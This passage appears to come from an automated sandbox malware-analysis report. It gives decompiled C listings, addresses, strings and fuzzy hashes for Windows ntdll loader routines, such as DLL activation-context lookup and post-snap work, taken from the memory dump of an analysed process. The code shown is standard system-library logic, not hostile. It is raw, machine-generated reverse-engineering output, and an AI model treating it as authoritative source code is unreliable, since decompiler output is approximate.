				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x179d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1798464; // 0x74cc0110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1795780 & 0x00000003) != 0) {
							E01725510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1795780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E016EB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1797984; // 0x1242b00
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1798464; // 0x74cc0110
					 *0x179b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E016D9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1795780 & 0x00000005) != 0) {
						_push(_t49);
						E01725510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                        0x016d8e0f
                                        0x016d8e16
                                        0x016d8e19
                                        0x016d8e1b
                                        0x016d8e21
                                        0x016d8e7f
                                        0x016d8e85
                                        0x01719354
                                        0x0171936c
                                        0x01719371
                                        0x0171937b
                                        0x01719381
                                        0x01719381
                                        0x0171937b
                                        0x016d8e9d
                                        0x016d8e9d
                                        0x016d8e29
                                        0x016d8e2c
                                        0x016d8e38
                                        0x016d8e3e
                                        0x016d8e43
                                        0x016d8eb5
                                        0x016d8eb9
                                        0x017192aa
                                        0x017192af
                                        0x017192e8
                                        0x017192e8
                                        0x017192af
                                        0x016d8eb9
                                        0x016d8e45
                                        0x016d8e53
                                        0x016d8e5b
                                        0x016d8e5f
                                        0x016d8e78
                                        0x016d8e78
                                        0x016d8e7d
                                        0x016d8ec3
                                        0x016d8ecd
                                        0x016d8ed2
                                        0x016d8ed2
                                        0x016d8ec5
                                        0x016d8ec5
                                        0x00000000
                                        0x016d8e7d
                                        0x016d8e67
                                        0x016d8ea4
                                        0x0171931a
                                        0x00000000
                                        0x00000000
                                        0x01719320
                                        0x016d8ea4
                                        0x016d8e70
                                        0x01719325
                                        0x01719340
                                        0x01719345
                                        0x01719345
                                        0x016d8e76
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000

                                        Strings
                                        • minkernel\ntdll\ldrsnap.c, xrefs: 0171933B, 01719367
                                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0171932A
                                        • Querying the active activation context failed with status 0x%08lx, xrefs: 01719357
                                        • LdrpFindDllActivationContext, xrefs: 01719331, 0171935D
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                        • API String ID: 0-3779518884
                                        • Opcode ID: 19a76a4b702d4f63aaf169a575ba406efb5b3da8a383fc9e4fdaab8cd5879e09
                                        • Instruction ID: 8caafeedb74aa4083bae473d999137c7c8841ab01a031a5d3d1b0768d941ca45
                                        • Opcode Fuzzy Hash: 19a76a4b702d4f63aaf169a575ba406efb5b3da8a383fc9e4fdaab8cd5879e09
                                        • Instruction Fuzzy Hash: C6415B31E003159FDB36AB0CCC8DA79B7BDBB44718F068569DA0457252E7709D818FC1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016B8794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 83%
                                        			E016B8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E016B934A() != 0) {
								_t159 = E0172A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1795780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01725510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1795780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E016B849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E016B8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E016B8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1795c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1795c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E016C2280(_t92, 0x17986cc);
															_t94 = E01779DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E016D61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1795c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E016B8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1795c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1795c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E016EF380(_t136, 0x1681184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E016C2280(_t108, 0x17986cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E016D61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01779D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E016BFFB0(_t118, _t156, 0x17986cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E016E9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                        0x016b8799
                                        0x016b879d
                                        0x016b87a1
                                        0x016b87a3
                                        0x016b87a8
                                        0x016b87c3
                                        0x016b87c3
                                        0x016b87c8
                                        0x016b87d1
                                        0x016b87d4
                                        0x016b87d8
                                        0x016b87e5
                                        0x016b87ec
                                        0x01709bfe
                                        0x01709c00
                                        0x01709c02
                                        0x01709c08
                                        0x01709c0d
                                        0x01709c0f
                                        0x01709c14
                                        0x01709c2d
                                        0x01709c32
                                        0x01709c37
                                        0x01709c3a
                                        0x01709c3c
                                        0x01709c42
                                        0x01709c42
                                        0x01709c3c
                                        0x01709c02
                                        0x016b87da
                                        0x016b87df
                                        0x016b87e3
                                        0x00000000
                                        0x00000000
                                        0x016b87e3
                                        0x016b87f2
                                        0x00000000
                                        0x016b87fb
                                        0x016b87fd
                                        0x016b87fe
                                        0x016b880e
                                        0x016b880f
                                        0x016b8810
                                        0x016b8814
                                        0x016b881a
                                        0x016b881c
                                        0x016b881f
                                        0x016b8821
                                        0x016b8822
                                        0x016b8824
                                        0x016b8826
                                        0x016b882c
                                        0x016b882e
                                        0x01709c48
                                        0x01709c48
                                        0x016b8834
                                        0x016b8834
                                        0x016b8837
                                        0x00000000
                                        0x00000000
                                        0x016b8837
                                        0x016b882e
                                        0x016b883d
                                        0x016b8840
                                        0x016b8843
                                        0x016b8846
                                        0x016b8849
                                        0x016b884c
                                        0x016b884e
                                        0x016b8850
                                        0x016b8852
                                        0x016b8854
                                        0x016b8857
                                        0x016b88b4
                                        0x016b88b6
                                        0x016b88b6
                                        0x016b8859
                                        0x016b8859
                                        0x016b8859
                                        0x016b8861
                                        0x016b8866
                                        0x016b886a
                                        0x016b893d
                                        0x016b8941
                                        0x00000000
                                        0x016b8947
                                        0x016b8947
                                        0x016b894a
                                        0x016b894c
                                        0x00000000
                                        0x016b8952
                                        0x016b8955
                                        0x016b895a
                                        0x016b895d
                                        0x016b895d
                                        0x016b895f
                                        0x016b8961
                                        0x016b8961
                                        0x016b8968
                                        0x00000000
                                        0x00000000
                                        0x016b896a
                                        0x016b896b
                                        0x016b896e
                                        0x00000000
                                        0x016b8970
                                        0x016b8970
                                        0x016b8970
                                        0x016b8970
                                        0x016b8972
                                        0x016b8972
                                        0x016b8974
                                        0x00000000
                                        0x016b897a
                                        0x016b897a
                                        0x016b897d
                                        0x00000000
                                        0x016b8983
                                        0x01709c65
                                        0x01709c6d
                                        0x01709c72
                                        0x01709c75
                                        0x01709c75
                                        0x01709c82
                                        0x01709c86
                                        0x01709c87
                                        0x01709c88
                                        0x01709c89
                                        0x01709c8c
                                        0x01709c90
                                        0x01709c95
                                        0x01709c97
                                        0x01709ca0
                                        0x01709ca3
                                        0x01709ca9
                                        0x01709ca9
                                        0x00000000
                                        0x01709ca9
                                        0x01709ca3
                                        0x00000000
                                        0x01709c97
                                        0x016b897d
                                        0x00000000
                                        0x016b8974
                                        0x016b8988
                                        0x016b8992
                                        0x016b8996
                                        0x00000000
                                        0x016b8996
                                        0x016b894c
                                        0x00000000
                                        0x016b8870
                                        0x016b887b
                                        0x016b887d
                                        0x016b887f
                                        0x016b8881
                                        0x016b8884
                                        0x016b8884
                                        0x016b8886
                                        0x016b8889
                                        0x016b888c
                                        0x016b888e
                                        0x016b8891
                                        0x016b8891
                                        0x016b8898
                                        0x00000000
                                        0x00000000
                                        0x016b889a
                                        0x016b889b
                                        0x016b889e
                                        0x00000000
                                        0x00000000
                                        0x016b88a0
                                        0x016b88a8
                                        0x016b88b0
                                        0x016b88b2
                                        0x016b88d3
                                        0x016b88d5
                                        0x00000000
                                        0x016b88d7
                                        0x016b88db
                                        0x016b88dc
                                        0x016b88e0
                                        0x016b88e8
                                        0x016b88ee
                                        0x016b88f0
                                        0x016b88f3
                                        0x016b88fc
                                        0x016b8901
                                        0x016b8906
                                        0x016b890c
                                        0x016b890c
                                        0x016b890f
                                        0x016b8916
                                        0x016b8917
                                        0x016b8918
                                        0x016b8919
                                        0x016b891a
                                        0x016b891f
                                        0x016b8921
                                        0x01709c52
                                        0x01709c55
                                        0x01709c5b
                                        0x01709cac
                                        0x01709cc0
                                        0x01709cc0
                                        0x01709c55
                                        0x016b8927
                                        0x016b8927
                                        0x016b892f
                                        0x016b8933
                                        0x00000000
                                        0x016b88f5
                                        0x016b88f5
                                        0x00000000
                                        0x016b88f7
                                        0x016b88f7
                                        0x016b88fa
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x016b88fa
                                        0x016b88f5
                                        0x016b88f3
                                        0x00000000
                                        0x016b88d5
                                        0x00000000
                                        0x016b88b2
                                        0x016b88c9
                                        0x00000000
                                        0x016b88c9
                                        0x016b887f
                                        0x016b886a
                                        0x016b8857
                                        0x016b8852
                                        0x016b88bf
                                        0x016b88bf
                                        0x016b87aa
                                        0x016b87ad
                                        0x016b87ae
                                        0x016b87b4
                                        0x016b87b5
                                        0x016b87b6
                                        0x016b87b8
                                        0x016b87bd
                                        0x016b87c1
                                        0x016b87f4
                                        0x016b87fa
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x016b87c1
                                        0x00000000

                                        Strings
                                        • minkernel\ntdll\ldrsnap.c, xrefs: 01709C28
                                        • LdrpDoPostSnapWork, xrefs: 01709C1E
                                        • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01709C18
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                        • API String ID: 2994545307-1948996284
                                        • Opcode ID: a5d92d940554ed7332856d483c5cae84cc99e87a944ee6a5a056388341cf957b
                                        • Instruction ID: c34523705bb2e77c7392e30d6399ebf1d31ed5536cd4b55092942d0199e14982
                                        • Opcode Fuzzy Hash: a5d92d940554ed7332856d483c5cae84cc99e87a944ee6a5a056388341cf957b
                                        • Instruction Fuzzy Hash: B191E071A00216DBEF29DF5DDCC0AFAB7BEFF44314B154169DA05AB241E731A981CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016B7E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 98%
                                        			E016B7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E016BCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E016AC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1795780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01725510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1795780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E016C7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E016C7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01727016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E016C7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E016C7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01727016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E016DA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E016AB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                        0x016b7e4c
                                        0x016b7e50
                                        0x016b7e55
                                        0x016b7e58
                                        0x016b7e5d
                                        0x016b7e71
                                        0x016b7f33
                                        0x016b7e77
                                        0x016b7e77
                                        0x016b7e79
                                        0x016b7e79
                                        0x016b7e7e
                                        0x016b7f45
                                        0x01709848
                                        0x00000000
                                        0x01709848
                                        0x016b7f4e
                                        0x016b7f53
                                        0x016b7f5a
                                        0x00000000
                                        0x00000000
                                        0x0170985a
                                        0x01709862
                                        0x01709866
                                        0x00000000
                                        0x0170986c
                                        0x00000000
                                        0x0170986c
                                        0x016b7e84
                                        0x016b7e84
                                        0x016b7e8d
                                        0x01709871
                                        0x016b7eb8
                                        0x016b7ec0
                                        0x016b7ec0
                                        0x016b7e9a
                                        0x0170987e
                                        0x00000000
                                        0x00000000
                                        0x01709884
                                        0x0170988b
                                        0x017098a7
                                        0x017098ac
                                        0x017098b1
                                        0x017098b6
                                        0x017098b8
                                        0x017098b8
                                        0x017098b9
                                        0x00000000
                                        0x017098b9
                                        0x016b7ea0
                                        0x016b7ea7
                                        0x00000000
                                        0x00000000
                                        0x016b7eac
                                        0x016b7eb1
                                        0x016b7ec6
                                        0x016b7ed0
                                        0x017098cc
                                        0x016b7ed6
                                        0x016b7ed6
                                        0x016b7ed6
                                        0x016b7ede
                                        0x016b7ee3
                                        0x017098e3
                                        0x017098f0
                                        0x01709902
                                        0x017098f2
                                        0x017098fb
                                        0x017098fb
                                        0x01709907
                                        0x0170991d
                                        0x0170991d
                                        0x01709907
                                        0x017098e3
                                        0x016b7ef0
                                        0x016b7f14
                                        0x016b7f14
                                        0x016b7f1e
                                        0x01709946
                                        0x016b7f24
                                        0x016b7f24
                                        0x016b7f24
                                        0x016b7f2c
                                        0x0170996a
                                        0x01709975
                                        0x01709975
                                        0x0170997e
                                        0x01709993
                                        0x01709993
                                        0x0170997e
                                        0x00000000
                                        0x016b7ef2
                                        0x016b7efc
                                        0x016b7f0a
                                        0x016b7f0e
                                        0x01709933
                                        0x00000000
                                        0x01709933
                                        0x00000000
                                        0x016b7f0e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x016b7eb1

                                        Strings
                                        • Could not validate the crypto signature for DLL %wZ, xrefs: 01709891
                                        • LdrpCompleteMapModule, xrefs: 01709898
                                        • minkernel\ntdll\ldrmap.c, xrefs: 017098A2
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                        • API String ID: 0-1676968949
                                        • Opcode ID: 12eb3291fe63dcd99cb4433bc05a34d25089cd30211c08424262dc326c18b2c0
                                        • Instruction ID: 0baa7d474c8d79615160d35f5ea27a22fb3da1cd224d5b02b35aebd377b26eaa
                                        • Opcode Fuzzy Hash: 12eb3291fe63dcd99cb4433bc05a34d25089cd30211c08424262dc326c18b2c0
                                        • Instruction Fuzzy Hash: 2F51F131600745DBE722CB6CCD84BAABBE4EF84714F040699EA559B3D2D734ED82CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016AE620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 93%
                                        			E016AE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E016AF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E016E95D0();
						}
						if(_t78 != 0) {
							L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E016EFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E016EBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E016E9600();
					if(_t97 < 0) {
						goto L6;
					}
					E016EBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L016AF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E016EBB40(_t83, _t102 + 0x24, _t78);
								if(L016B43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E016EBB40(_t84, _t102 + 0x24, _t94);
									if(L016B43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
